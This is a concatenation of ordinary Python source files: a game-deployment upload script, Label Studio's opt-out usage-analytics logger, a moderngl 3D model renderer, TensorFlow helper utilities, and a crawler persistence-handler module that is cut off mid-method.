log(' %u/%u (%s/%s)' % (deploy_info.uploaded_files,
deploy_info.num_files,
_fmt_value(current_uploaded_bytes),
_fmt_value(current_num_bytes)))
else:
if current_uploaded_bytes != 0 and old_uploaded_bytes == 0:
log('Uploading modified files...')
if deploy_info.num_files > 1000:
sleep_step = 1.0
old_num_bytes = current_num_bytes
old_uploaded_bytes = current_uploaded_bytes
if deploy_info.done:
if not silent:
if verbose:
log('Done uploading.')
else:
log('Done uploading: %u files (%s bytes)' % (deploy_info.num_files,
_fmt_value(current_num_bytes)))
break
return 0
def _postupload_progress(deploy_info, connection, cookie, silent, verbose):
if silent:
sleep_step = 1.0
elif verbose:
log('Post processing:')
sleep_step = 0.2
else:
log('Post processing files...')
sleep_step = 0.4
if not deploy_info.hub_session:
error('No deploy session found.')
return -1
old_progress = 0
while True:
sleep(sleep_step)
if deploy_info.error:
error(deploy_info.error)
return -1
try:
r = connection.request('POST',
'/dynamic/upload/progress/%s' % deploy_info.hub_session,
headers={'Cookie': cookie},
redirect=False)
except (HTTPError, SSLError) as e:
error(e)
error('Post-upload progress check failed.')
return -1
if r.status != 200:
error('Wrong Hub answer.')
return -1
r_data = json_loads(r.data)
# pylint: disable=E1103
current_progress = int(r_data.get('progress', -1))
error_msg = str(r_data.get('error', ''))
# pylint: enable=E1103
if error_msg:
error('Post-upload processing failed: %s' % error_msg)
return -1
if -1 == current_progress:
error('Invalid post-upload progress.')
return -1
if verbose and not silent:
if old_progress != current_progress:
log('Progress: %u%%' % current_progress)
old_progress = current_progress
if 100 <= current_progress:
if not silent:
log('Post processing completed.')
return 0
def main():
# pylint: disable=E1103
options = _check_options()
locale.setlocale(locale.LC_ALL, '')
verbose = options.verbose
if verbose:
logging.disable(logging.INFO)
else:
logging.disable(logging.WARNING)
_add_missing_mime_types()
try:
game = Game(game_list=None,
game_path=path_abspath(path_dirname(options.input)),
slug=None,
games_root=options.cache,
deploy_enable=True,
manifest_name=path_basename(options.input))
_check_game(game)
silent = options.silent
if not silent:
log('Deploying "%s" to "%s".' % (game.slug, options.hub))
connection = connection_from_url(options.hub, maxsize=8, timeout=8.0)
cookie = login(connection, options)
(project, projectversion, projectversion_title) = _check_project(connection, options, cookie)
result = 0
deploy_info = None
deploy_thread = None
try:
deploy_info = Deployment(game,
connection,
project,
projectversion,
projectversion_title,
_get_cookie_value(cookie),
options.cache)
deploy_thread = Thread(target=deploy_info.deploy, args=[options.ultra])
deploy_thread.start()
start_time = time()
result = _progress(deploy_info, silent, verbose)
if 0 == result:
result = _postupload_progress(deploy_info, connection, cookie, silent, verbose)
if 0 == result:
if not silent:
log('Deployment time: %s' % _fmt_time((time() - start_time)))
game.set_deployed()
except KeyboardInterrupt:
warning('Program stopped by user!')
if deploy_info:
deploy_info.cancel()
result = -1
except Exception as e:
error(str(e))
if deploy_info:
deploy_info.cancel()
result = -1
if deploy_info:
del deploy_info
if deploy_thread:
del deploy_thread
logout(connection, cookie)
return result
except GameError:
return -1
#except Exception as e:
# error(str(e))
# return -1
if __name__ == "__main__":
exit(main())
|
contextlog.py
|
"""This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import logging
import os
import sys
import io
import requests
import calendar
import threading
import json
import platform
from datetime import datetime
from django.conf import settings
from uuid import uuid4
from .common import get_app_version, get_bool_env, get_client_ip
from .io import get_config_dir
logger = logging.getLogger(__name__)
class ContextLog(object):
def __init__(self):
self.collect_analytics = get_bool_env('collect_analytics', True)
self.version = get_app_version()
self.server_id = self._get_server_id()
def _get_label_studio_env(self):
env = {}
for env_key, env_value in os.environ.items():
if env_key.startswith('LABEL_STUDIO_'):
env[env_key] = env_value
return env
def _get_server_id(self):
user_id_file = os.path.join(get_config_dir(), 'user_id')
if not os.path.exists(user_id_file):
user_id = str(uuid4())
with io.open(user_id_file, mode='w', encoding='utf-8') as fout:
fout.write(user_id)
else:
with io.open(user_id_file, encoding='utf-8') as f:
user_id = f.read()
return user_id
def _is_docker(self):
path = '/proc/self/cgroup'
return (
os.path.exists('/.dockerenv') or
os.path.isfile(path) and any('docker' in line for line in open(path, encoding='utf-8'))
)
def _get_timestamp_now(self):
return calendar.timegm(datetime.now().utctimetuple())
def _prepare_json(self, payload, request):
j = payload['json']
view_name = payload['view_name']
if view_name in ('tasks:api:task-annotations', 'tasks:api-annotations:annotation-detail'):
types = [r.get('type') for r in j.get('result', [])]
payload['json'] = {'result': types, 'lead_time': j.get('lead_time')}
def _get_response_content(self, response):
try:
return json.loads(response.content)
except:
return
def _prepare_response(self, payload):
view_name = payload['view_name']
if view_name in (
'data_export:api-projects:project-export',
'data_manager:api:view-tasks',
'data_manager:data_manager.api.ProjectActionsAPI',
'data_manager:data_manager.api.TaskAPI',
'projects:api-templates:template-list',
'data_import:api-projects:project-file-upload-list',
'tasks:api:task-annotations',
'tasks:api-annotations:annotation-detail'
) and payload['status_code'] in (200, 201):
payload['response'] = None
def _exclude_endpoint(self, request):
if request.resolver_match and request.resolver_match.view_name in [
'django.views.static.serve',
'data_import:data-upload',
'version'
]:
return True
if request.GET.get('interaction', None) == 'timer':
return True
def send(self, request=None, response=None, body=None):
if settings.DEBUG:
try:
payload = self.create_payload(request, response, body)
except Exception as exc:
logger.error(exc, exc_info=True)
else:
if get_bool_env('DEBUG_CONTEXTLOG', False):
logger.debug(json.dumps(payload, indent=2))
pass
else:
# ignore specific events
if not self.collect_analytics or self._exclude_endpoint(request):
return
thread = threading.Thread(target=self.send_job, args=(request, response, body))
thread.start()
@staticmethod
def browser_exists(request):
return hasattr(request, 'user_agent') and request.user_agent and \
hasattr(request.user_agent, 'browser') and request.user_agent.browser
def create_payload(self, request, response, body):
payload = {
'url': request.build_absolute_uri(),
'server_id': self._get_server_id(),
'server_time': self._get_timestamp_now(),
'session_id': request.session.get('uid', None),
'client_ip': get_client_ip(request),
'is_docker': self._is_docker(),
'python': str(sys.version_info[0]) + '.' + str(sys.version_info[1]),
'env': self._get_label_studio_env(),
'version': self.version,
'view_name': request.resolver_match.view_name if request.resolver_match else None,
'namespace': request.resolver_match.namespace if request.resolver_match else None,
'scheme': request.scheme,
'method': request.method,
'values': request.GET.dict(),
'json': body,
'language': request.LANGUAGE_CODE,
'content_type': request.content_type,
'content_length': int(request.environ.get('CONTENT_LENGTH')) if request.environ.get('CONTENT_LENGTH') else None,
'status_code': response.status_code,
'response': self._get_response_content(response)
}
if self.browser_exists(request):
payload.update({
'is_mobile': request.user_agent.is_mobile,
'is_tablet': request.user_agent.is_tablet,
'is_touch_capable': request.user_agent.is_touch_capable,
'is_pc': request.user_agent.is_pc,
'is_bot': request.user_agent.is_bot,
'browser': request.user_agent.browser.family,
'browser_version': request.user_agent.browser.version_string,
'os': request.user_agent.os.family,
'platform_system': platform.system(),
'platform_release': platform.release(),
'os_version': request.user_agent.os.version_string,
'device': request.user_agent.device.family,
})
self._prepare_json(payload, request)
self._prepare_response(payload)
return payload
def send_job(self, request, response, body):
try:
payload = self.create_payload(request, response, body)
except:
pass
else:
try:
url = 'https://tele.labelstud.io'
requests.post(url=url, json=payload, timeout=3.0)
except:
pass
|
render.py
|
import off_loader as ol
import moderngl
import numpy as np
from pyrr import Matrix44
from PIL import Image
dodecahedron_polar_pos = [[0.78539816, 0.61547971],
[0.78539816, -0.61547971],
[-0.78539816, 0.61547971],
[-0.78539816, -0.61547971],
[-0.78539816, 0.61547971],
[-0.78539816, -0.61547971],
[0.78539816, 0.61547971],
[0.78539816, -0.61547971],
[1.57079633, 1.2059325],
[1.57079633, -1.2059325],
[-1.57079633, 1.2059325],
[-1.57079633, -1.2059325],
[0., 0.36486383],
[0., -0.36486383],
[-0., 0.36486383],
[-0., -0.36486383],
[1.2059325, 0.],
[-1.2059325, 0.],
[-1.2059325, 0.],
[1.2059325, 0.]]
class Render(object):
def __init__(self, ctx=None):
if ctx is None:
self.ctx = moderngl.create_standalone_context()
else:
self.ctx = ctx
self.prog = self.ctx.program(
vertex_shader='''
#version 330
uniform mat4 Mvp;
in vec3 in_vert;
in vec3 in_norm;
out vec3 v_vert;
out vec3 v_norm;
void main() {
v_vert = in_vert;
v_norm = in_norm;
gl_Position = Mvp*vec4(v_vert, 1.0);
}
''',
fragment_shader='''
#version 330
uniform vec3 Light;
in vec3 v_vert;
in vec3 v_norm;
out vec4 f_color;
void main() {
vec3 light = Light - v_vert;
float d_light = length(light);
float lum = abs(dot(normalize(light), normalize(v_norm)));
lum = clamp(45.0/(d_light*(d_light+0.02)) * lum, 0.0,1.0)* 0.6 +0.3;
f_color = vec4(lum * vec3(1.0, 1.0, 1.0), 0.0);
}
''',
)
self.vbo_vertices = None
self.vbo_normals = None
self.vao = None
self.fbo = None
# uniform variables
self.light = self.prog['Light']
self.mvp = self.prog['Mvp']
def setViewport(self, viewport):
self.ctx.viewport = viewport
def load_model(self, vertices, normals):
vertices = vertices.flatten()
normals = normals.flatten()
if self.vbo_vertices is not None:
self.vbo_vertices.release()
if self.vbo_normals is not None:
self.vbo_normals.release()
self.vbo_vertices = self.ctx.buffer(vertices.astype(np.float32).tobytes())
self.vbo_normals = self.ctx.buffer(normals.astype(np.float32).tobytes())
if self.vao is not None:
self.vao.release()
self.vao = self.ctx.vertex_array(self.prog, [
(self.vbo_vertices, '3f', 'in_vert'),
(self.vbo_normals, '3f', 'in_norm'),
])
def render_frame(self, theta, phi=30 / 180 * np.pi):
self.ctx.clear(1.0, 1.0, 1.0)
self.ctx.enable(moderngl.DEPTH_TEST)
camera_r = 3.88 # >= 1 / sin(pi/12)
light_r = 6.5
cos_theta, sin_theta, cos_phi, sin_phi = np.cos(theta), np.sin(theta), np.cos(phi), np.sin(phi)
camera_pos = (cos_theta * cos_phi * camera_r, sin_theta * cos_phi * camera_r, sin_phi * camera_r)
self.light.value = (cos_theta * cos_phi * light_r, sin_theta * cos_phi * light_r, sin_phi * light_r)
proj = Matrix44.perspective_projection(30.0, 1, 0.1, 1000.0)
lookat = Matrix44.look_at(
camera_pos,
(0.0, 0.0, 0.0), # look at origin
(0.0, 0.0, 1.0), # camera orientation
)
self.mvp.write((proj * lookat).astype('f4').tobytes())
self.vao.render()
def render_to_images(self, output_views=12, use_dodecahedron_views=False) -> [Image]:
"""
Render the model to `PIL` images
:param output_views: render views count
:param use_dodecahedron_views: use regular dodecahedron (20 vertices), output_views is `ignored` if True
:return: a list of images
"""
if self.fbo is None:
self.fbo = self.ctx.simple_framebuffer((1024, 1024))
self.fbo.use()
images = []
if use_dodecahedron_views:
for theta, phi in dodecahedron_polar_pos:
self.render_frame(theta, phi)
image = Image.frombytes('RGB', self.fbo.size, self.fbo.read(), 'raw', 'RGB', 0, -1)
images.append(image)
else:
delta_theta = 2 * np.pi / output_views
for i in range(output_views):
angle = delta_theta * i
self.render_frame(angle)
image = Image.frombytes('RGB', self.fbo.size, self.fbo.read(), 'raw', 'RGB', 0, -1)
images.append(image)
self.fbo.clear()
return images
def render_and_save(self, off_file, output_dir, output_views=12, use_dodecahedron_views=False):
self.load_model(*ol.load_off(off_file))
images = self.render_to_images(output_views, use_dodecahedron_views=use_dodecahedron_views)
self._save_images(images, off_file, output_dir)
# def _save_images_in_parallel(self, images, off_file, output_dir):
# import threading as th
# th.Thread(target=Render._save_images(images, off_file, output_dir)).start()
@staticmethod
def _save_images(images, off_file, output_dir):
for i, image in enumerate(images):
image = image.resize((299, 299), Image.BICUBIC)
image.save("%s/%s_%03d.jpg" % (output_dir, off_file.split('.')[0].split('/')[-1], i))
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('file', metavar='OFF_FILE', help='the off_file you want to render')
parser.add_argument('--views', type=int, default=12, metavar='N', help='count of views to render, default is 12')
parser.add_argument('--dodecahedron', action='store_true', help='use dodecahedron camera settings')
args = parser.parse_args()
render = Render()
off_file = args.file
print("loading model...")
model = ol.load_off(off_file)
render.load_model(*model)
print("start to render...")
images = render.render_to_images(args.views, args.dodecahedron)
for i, image in enumerate(images):
image = image.resize((512, 512), Image.BICUBIC)
image.save("out-%s.jpg" % i)
print("finished")
if __name__ == '__main__':
main()
|
utils.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
import pickle
import threading
from contextlib import contextmanager
from functools import wraps
from collections import deque
import tensorflow as tf
# TODO: move to utils
def _check_file(path):
return os.path.isfile(path)
def save_pickle(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f)
def load_pickle(path):
with open(path, 'rb') as f:
obj = pickle.load(f)
return obj
def maybe_save(save_path):
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if _check_file(save_path):
obj = load_pickle(save_path)
else:
obj = f(*args, **kwargs)
save_pickle(obj, save_path)
return obj
return wrapper
return decorator
def start_threads(thread_fn, args, n_threads=1):
assert n_threads == 1, "Having multiple threads causes duplicate data in the queue."
threads = []
for n in range(n_threads):
t = threading.Thread(target=thread_fn, args=args)
t.daemon = True # thread will close when parent quits
t.start()
threads.append(t)
time.sleep(1) # enqueue a bunch before dequeue
return threads
def compose(data, *funcs):
for func in funcs:
data = func(data)
return data
def set_logging_verbosity(logging_verbosity="INFO"):
if logging_verbosity == "INFO":
tf.logging.set_verbosity(tf.logging.INFO)
elif logging_verbosity == "WARN":
tf.logging.set_verbosity(tf.logging.WARN)
elif logging_verbosity == "ERROR":
tf.logging.set_verbosity(tf.logging.ERROR)
elif logging_verbosity == "DEBUG":
tf.logging.set_verbosity(tf.logging.DEBUG)
class MovingAverage(object):
def __init__(self, size):
"""
Initialize your data structure here.
:type size: int
"""
self.__size = size
self.__sum = 0
self.__q = deque([])
def next(self, val):
"""
:type val: int
:rtype: float
"""
if len(self) == self.__size:
self.__sum -= self.__q.popleft()
self.__sum += val
self.__q.append(val)
return 1.0 * self.__sum / len(self.__q)
def __len__(self):
return len(self.__q)
def count_number_of_parameters():
total_parameters = 0
for variable in tf.trainable_variables():
# shape is an array of tf.Dimension
shape = variable.get_shape()
variable_parametes = 1
for dim in shape:
variable_parametes *= dim.value
total_parameters += variable_parametes
return total_parameters
def delete_files():
pass
|
persistence.py
|
# -*- coding: iso-8859-1 -*-
"""Module to store persistence handler classes.
Persistence handlers take care of all implementation details related to resource storage. They expose a common interface (defined in :class:`BasePersistenceHandler`) through which the server (and/or filters/crawlers) can load, save and perform other operations over resources independently from where and how the resources are actually stored. At any point in time, the collection status of each resource must be one of those defined in the struct-like class :class:`StatusCodes`.
"""
import os
import threading
import tempfile
import cStringIO
import glob
import re
import json
import csv
import Queue
import common
import mysql.connector
from datetime import datetime
from copy import deepcopy
from collections import deque
class StatusCodes():
"""A struct-like class to hold constants for resources status codes.
The numeric value of each code can be modified to match the one used in the final location where the resources are persisted. The name of each code (``SUCCEEDED``, ``INPROGRESS``, ``AVAILABLE``, ``FAILED``, ``ERROR``) must not be modified.
"""
SUCCEEDED = 2
INPROGRESS = 1
AVAILABLE = 0
FAILED = -1
ERROR = -2
class BasePersistenceHandler():
"""Abstract class. All persistence handlers should inherit from it or from other class that inherits."""
def __init__(self, configurationsDictionary):
"""Constructor.
Each persistence handler receives everything in its corresponding handler section of the XML configuration file as the parameter *configurationsDictionary*.
"""
self._extractConfig(configurationsDictionary)
self.status = StatusCodes()
def _extractConfig(self, configurationsDictionary):
"""Extract and store configurations.
If some configuration needs any kind of pre-processing, it is done here. Extend this method if you need to pre-process custom configuration options.
"""
self.config = configurationsDictionary
if ("echo" not in self.config): self.config["echo"] = {}
def setup(self):
"""Execute per client initialization procedures.
This method is called every time a connection to a new client is opened, allowing to execute initialization code on a per client basis (which differs from :meth:`__init__` that is called when the server instantiate the persistence handler, i.e., :meth:`__init__` is called just one time for the whole period of execution of the program).
"""
pass
def select(self):
"""Retrive an ``AVAILABLE`` resource.
Returns:
A tuple in the format (*resourceKey*, *resourceID*, *resourceInfo*).
* *resourceKey* (user defined type): Value that uniquely identify the resource internally. It works like a primary key in relational databases and makes possible the existence of resources with the same ID, if needed.
* *resourceID* (user defined type): Resource ID to be sent to a client.
* *resourceInfo* (dict): Other information related to the resource, if there is any.
"""
return (None, None, None)
def update(self, resourceKey, status, resourceInfo):
"""Update the specified resource, setting its status and information data to the ones given.
Args:
* *resourceKey* (user defined type): Value that uniquely identify the resource internally.
* *status* (:class:`StatusCodes`): New status of the resource.
* *resourceInfo* (dict): Other information related to the resource, if there is any.
"""
pass
def insert(self, resourcesList):
"""Insert new resources into the final location where resources are persisted.
Args:
* *resourcesList* (list): List of tuples containing all new resources to be inserted. Each resource is defined by a tuple in the format (*resourceID*, *resourceInfo*).
"""
pass
def count(self):
"""Count the number of resources in each status category.
Returns:
A tuple in the format (*total*, *succeeded*, *inprogress*, *available*, *failed*, *error*) where all fields are integers representing the number of resources with the respective status code.
"""
return (0, 0, 0, 0, 0, 0)
def reset(self, status):
"""Change to ``AVAILABLE`` all resources with the status code given.
Args:
* *status* (:class:`StatusCodes`): Status of the resources to be reseted.
Returns:
Number of resources reseted.
"""
return 0
def finish(self):
"""Execute per client finalization procedures.
This method is called every time a connection to a client is closed, allowing to execute finalization code on a per client basis. It is the counterpart of :meth:`setup`.
"""
pass
def shutdown(self):
"""Execute program finalization procedures (similar to a destructor).
This method is called when the server is shut down, allowing to execute finalization code in a global manner. It is intended to be the counterpart of :meth:`__init__`, but differs from :meth:`__del__() <python:object.__del__>` in that it is not bounded to the live of the persistence handler object itself, but rather to the span of execution time of the server.
"""
pass
# IMPORTANT NOTE: MemoryPersistenceHandler class was built as basis for FilePersistenceHandler and its extensions,
# and for test purposes. Altough it can be set in the configuration file, it is not intended for direct use in a
# production enviroment. In this case, choose one of the file based handlers instead
class MemoryPersistenceHandler(BasePersistenceHandler):
def __init__(self, configurationsDictionary):
BasePersistenceHandler.__init__(self, configurationsDictionary)
self.insertLock = threading.Lock()
self.resources = []
self.IDsHash = {}
self.statusRecords = {self.status.SUCCEEDED: [],
self.status.INPROGRESS: [],
self.status.AVAILABLE: deque(),
self.status.FAILED: [],
self.status.ERROR: []}
#self._loadTestData()
def _extractConfig(self, configurationsDictionary):
BasePersistenceHandler._extractConfig(self, configurationsDictionary)
if ("uniqueresourceid" not in self.config): self.config["uniqueresourceid"] = False
else: self.config["uniqueresourceid"] = common.str2bool(self.config["uniqueresourceid"])
if ("onduplicateupdate" not in self.config): self.config["onduplicateupdate"] = False
else: self.config["onduplicateupdate"] = common.str2bool(self.config["onduplicateupdate"])
def _save(self, pk, id, status, info, changeInfo = True):
if (pk is not None):
if (status is not None): self.resources[pk]["status"] = status
if (changeInfo):
if (self.resources[pk]["info"] is not None) and (info is not None): self.resources[pk]["info"].update(info)
else: self.resources[pk]["info"] = info
else:
self.resources.append({"id": id, "status": status, "info": info})
def _loadTestData(self):
self.resources.extend([
{"id": 1, "status": 0, "info": {"crawler_name": "c1", "response_code": 3}},
{"id": 2, "status": 0, "info": {"crawler_name": "c2", "response_code": 3}},
{"id": 3, "status": 0, "info": None},
{"id": 4, "status": 0, "info": None}
])
for pk, resource in enumerate(self.resources):
self.statusRecords[resource["status"]].append(pk)
if (self.config["uniqueresourceid"]):
if (resource["id"] not in self.IDsHash): self.IDsHash[resource["id"]] = pk
else: raise KeyError("Duplicated ID found in resources list: %s." % resource["id"])
def select(self):
try: pk = self.statusRecords[self.status.AVAILABLE].popleft()
except IndexError: return (None, None, None)
self._save(pk, None, self.status.INPROGRESS, None, False)
self.statusRecords[self.status.INPROGRESS].append(pk)
return (pk, self.resources[pk]["id"], deepcopy(self.resources[pk]["info"]))
def update(self, resourceKey, status, resourceInfo):
currentStatus = self.resources[resourceKey]["status"]
self.statusRecords[currentStatus].remove(resourceKey)
if (resourceInfo): self._save(resourceKey, None, status, resourceInfo)
else: self._save(resourceKey, None, status, resourceInfo, False)
self.statusRecords[status].append(resourceKey)
def insert(self, resourcesList):
for resourceID, resourceInfo in resourcesList:
if (self.config["uniqueresourceid"]) and (resourceID in self.IDsHash):
if (self.config["onduplicateupdate"]):
self._save(self.IDsHash[resourceID], None, None, resourceInfo)
continue
else: raise KeyError("Cannot insert resource, ID %s already exists." % resourceID)
with self.insertLock:
self.statusRecords[self.status.AVAILABLE].append(len(self.resources))
if (self.config["uniqueresourceid"]): self.IDsHash[resourceID] = len(self.resources)
self._save(None, resourceID, self.status.AVAILABLE, resourceInfo)
def count(self):
return (len(self.resources),
len(self.statusRecords[self.status.SUCCEEDED]),
len(self.statusRecords[self.status.INPROGRESS]),
len(self.statusRecords[self.status.AVAILABLE]),
len(self.statusRecords[self.status.FAILED]),
len(self.statusRecords[self.status.ERROR]))
def reset(self, status):
resetList = self.statusRecords[status][:]
for pk in resetList:
self.statusRecords[status].remove(pk)
self._save(pk, None, self.status.AVAILABLE, None, False)
self.statusRecords[self.status.AVAILABLE].appendleft(pk)
return len(resetList)
class FilePersistenceHandler(MemoryPersistenceHandler):
"""Load and dump resources from/to a file.
All resources in the file are loaded into memory before the server operations begin. So, this handler is recomended for small to medium size datasets that can be completely fitted into machine's memory. For larger datasets, consider using another persistence handler. Another option for large datasets is to divide the resources in more than one file, collecting the resources of one file at a time.
The default version of this handler supports CSV and JSON files. It is possible to add support to other file types by subclassing :class:`BaseFileColumns` and :class:`BaseFileHandler`. The new file type must also be included in the :attr:`supportedFileTypes` dictionary.
"""
class BaseFileColumns():
"""Hold column names of data in the file, allowing fast access to names of ID, status and info columns."""
def __init__(self, fileName, idColumn, statusColumn):
self.names = self._extractColNames(fileName)
self.idName = idColumn
self.statusName = statusColumn
self.infoNames = [name for name in self.names if (name not in (self.idName, self.statusName))]
def _extractColNames(self, fileName):
"""Extract column names from the file.
Must be overriden, as column names extraction depends on the file type.
Returns:
A list of all column names in the file.
"""
return []
class BaseFileHandler():
"""Handle low level details about persistence in a specific file type.
Each resource loaded from a file is stored in memory in a dictionary in the format ``{"id": X, "status": X, "info": {...}}``, which is the resource internal representation format. This handler is responsible for translating resources in the internal representation format to the format used in a specific file type and vice-versa.
"""
def __init__(self): self.status = StatusCodes()
def parse(self, resource, columns):
"""Transform resource from file format to internal representation format.
Args:
* *resource* (file specific type): Resource given in file format.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
Returns:
A resource in internal representation format.
"""
return {"id": None, "status": None, "info": None}
def unparse(self, resource, columns):
"""Transform resource from internal representation format to file format.
Args:
* *resource* (dict): Resource given in internal representation format.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
Returns:
A resource in file format.
"""
return None
def load(self, file, columns):
"""Load resources in file format and yield them in internal representation format.
Args:
* *file* (:ref:`file object<python:bltin-file-objects>`): File object bounded to the physical file where resources are stored.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
Yields:
A resource in internal representation format.
"""
yield {"id": None, "status": None, "info": None}
def dump(self, resources, file, columns):
"""Save resources in internal representation format to file format.
Args:
* *resources* (list): List of resources in internal representation format.
* *file* (:ref:`file object<python:bltin-file-objects>`): File object bounded to the physical file where resources will be stored.
* *columns* (:class:`BaseFileColumns <FilePersistenceHandler.BaseFileColumns>` subclass): Object holding column names.
"""
pass
class CSVColumns(BaseFileColumns):
"""Hold column names of data in CSV files, allowing fast access to names of ID, status and info columns."""
def _extractColNames(self, fileName):
with open(fileName, "r") as file:
reader = csv.DictReader(file, quoting = csv.QUOTE_MINIMAL, quotechar = "'", skipinitialspace = True)
columns = reader.fieldnames
return [col.strip("\"") for col in columns]
class CSVHandler(BaseFileHandler):
"""Handle low level details about persistence in CSV files.
.. note::
This class and :class:`CSVColumns <FilePersistenceHandler.CSVColumns>` class uses Python's built-in :mod:`python:csv` module internally.
"""
def _parseValue(self, value):
if (not value): return None
if (not value.startswith("\"")):
if value.upper() in ("TRUE", "T"): return True
if value.upper() in ("FALSE", "F"): return False
if value.upper() in ("NONE", "NULL"): return None
if ("." in value): return float(value)
return int(value)
return value.strip("\"")
def _unparseValue(self, value):
if isinstance(value, basestring):
if isinstance(value, unicode): value = value.encode("utf-8")
return "".join(("\"", value, "\""))
if isinstance(value, bool): return ("T" if (value) else "F")
return value
def parse(self, resource, columns):
parsed = {"id": self._parseValue(resource[columns.idName])}
if ((columns.statusName in columns.names) and (resource[columns.statusName])):
parsed["status"] = self._parseValue(resource[columns.statusName])
else: parsed["status"] = self.status.AVAILABLE
if (columns.infoNames):
parsed["info"] = {}
for column in columns.infoNames:
parsed["info"][column] = self._parseValue(resource[column])
return parsed
def unparse(self, resource, columns):
buffer = cStringIO.StringIO()
writer = csv.DictWriter(buffer, columns.names, quoting = csv.QUOTE_MINIMAL, quotechar = "'", lineterminator = "\n", extrasaction = "ignore")
unparsed = {columns.idName: self._unparseValue(resource["id"])}
if (resource["status"] != self.status.AVAILABLE):
unparsed[columns.statusName] = self._unparseValue(resource["status"])
if (resource["info"]):
for key, value in resource["info"].iteritems():
if (value is not None) and (key in columns.infoNames): unparsed[key] = self._unparseValue(value)
writer.writerow(unparsed)
return buffer.getvalue()
def load(self, file, columns):
reader = csv.DictReader(file, columns.names, quoting = csv.QUOTE_MINIMAL, quotechar = "'", skipinitialspace = True)
next(reader)
for resource in reader:
yield self.parse(resource, columns)
def dump(self, resources, file, columns):
writer = csv.DictWriter(file, columns.names, quoting = csv.QUOTE_MINIMAL, quotechar = "'", lineterminator = "\n", extrasaction = "ignore")
writer.writeheader()
# In case of CSV, it is easier and faster to unparse the resource here instead of using
# unparse method, so we can use writerow method to directly save the resource to file
for resource in resources:
row = {columns.idName: self._unparseValue(resource["id"])}
if (resource["status"] != 0): row[columns.statusName] = self._unparseValue(resource["status"])
if (resource["info"]):
for key, value in resource["info"].iteritems():
if (value is not None) and (key in columns.infoNames): row[key] = self._unparseValue(value)
writer.writerow(row)
class JSONColumns(BaseFileColumns):
"""Hold column names of data in JSON files, allowing fast access to names of ID, status and info columns."""
def _extractColNames(self, fileName):
with open(fileName, "r") as file: content = file.read(1024)
columnsStart = content.index("[") + 1
columnsEnd = content.index("]")
columns = content[columnsStart:columnsEnd]
return [name.strip("\" ") for name in columns.split(",")]
class JSONHandler(BaseFileHandler):
"""Handle low level details about persistence in JSON files.
.. note::
This class and :class:`JSONColumns <FilePersistenceHandler.JSONColumns>` uses Python's built-in :mod:`python:json` module internally.
"""
def parse(self, resource, columns):
parsed = {"id": resource[columns.idName]}
if ((columns.statusName in columns.names) and (columns.statusName in resource)):
parsed["status"] = resource[columns.statusName]
else: parsed["status"] = self.status.AVAILABLE
if (columns.infoNames):
parsed["info"] = {}
for column in columns.infoNames:
if (column in resource): parsed["info"][column] = resource[column]
else: parsed["info"][column] = None
return parsed
def unparse(self, resource, columns):
unparsed = {columns.idName: resource["id"]}
if (resource["status"] != self.status.AVAILABLE): unparsed[columns.statusName] = resource["status"]
if (resource["info"]):
for key, value in resource["info"].iteritems():
if (value is not None) and (key in columns.infoNames): unparsed[key] = value
return json.dumps(unparsed)
def load(self, file, columns):
input = json.load(file)
for resource in input["resources"]:
yield self.parse(resource, columns)
def dump(self, resources, file, columns):
file.write("{\"columns\": %s, \"resources\": [" % json.dumps(columns.names))
separator = ""
for resource in resources:
file.write("%s%s" % (separator, self.unparse(resource, columns)))
separator = ", "
file.write("]}")
supportedFileTypes = {
# Type : [FileColumns, FileHandler]
"CSV" : ["CSVColumns", "CSVHandler"],
"JSON" : ["JSONColumns", "JSONHandler"]
}
"""Associate file types and its columns and handler classes. The type of the current file is provided by the user directly (through the ``filetype`` option in the XML configuration file) or indirectly (through the file extension extracted from file name). When checking if the type of the current file is on the list of supported file types, the comparison between the strings is case insensitive."""
def __init__(self, configurationsDictionary):
MemoryPersistenceHandler.__init__(self, configurationsDictionary)
self.echo = common.EchoHandler(self.config["echo"])
self.saveLock = threading.Lock()
self.dumpExceptionEvent = threading.Event()
self._setFileHandler()
with open(self.config["filename"], "r") as inputFile:
resourcesList = self.fileHandler.load(inputFile, self.fileColumns)
for resource in resourcesList:
self.statusRecords[resource["status"]].append(len(self.resources))
if (self.config["uniqueresourceid"]):
if (resource["id"] not in self.IDsHash): self.IDsHash[resource["id"]] = len(self.resources)
else: raise KeyError("Duplicated ID found in '%s': %s." % (self.config["filename"], resource["id"]))
if ("info" not in resource): resource["info"] = None
self.resources.append(resource)
self.timer = threading.Timer(self.config["savetimedelta"], self._dumpTimerThread)
self.timer.daemon = True
self.timer.start()
def _extractConfig(self, configurationsDictionary):
MemoryPersistenceHandler._extractConfig(self, configurationsDictionary)
if ("filetype" in self.config): self.config["filetype"] = self.config["filetype"].lower()
else: self.config["filetype"] = os.path.splitext(self.config["filename"])[1][1:].lower()
self.config["savetimedelta"] = int(self.config["savetimedelta"])
if (self.config["savetimedelta"] < 1): raise ValueError("Parameter 'savetimedelta' must be greater than zero.")
def _save(self, pk, id, status, info, changeInfo = True):
with self.saveLock: MemoryPersistenceHandler._save(self, pk, id, status, info, changeInfo)
def _setFileHandler(self):
for type, handler in FilePersistenceHandler.supportedFileTypes.iteritems():
if (self.config["filetype"] == type.lower()):
FileColumnsClass = getattr(self, handler[0])
FileHandlerClass = getattr(self, handler[1])
self.fileColumns = FileColumnsClass(self.config["filename"], self.config["resourceidcolumn"], self.config["statuscolumn"])
self.fileHandler = FileHandlerClass()
return
raise TypeError("Unknown file type '%s' for file '%s'." % (self.config["filetype"], self.config["filename"]))
def _checkDumpException(function):
def decoratedFunction(self, *args):
if (self.dumpExceptionEvent.is_set()):
raise RuntimeError("Exception in dump thread. Execution of FilePersistenceHandler aborted.")
return function(self, *args)
return decoratedFunction
def _dump(self):
self.echo.out("[File: %s] Saving list of resources to file..." % self.config["filename"])
with tempfile.NamedTemporaryFile(mode = "w", suffix = ".temp", prefix = "dump_", dir = "", delete = False) as temp:
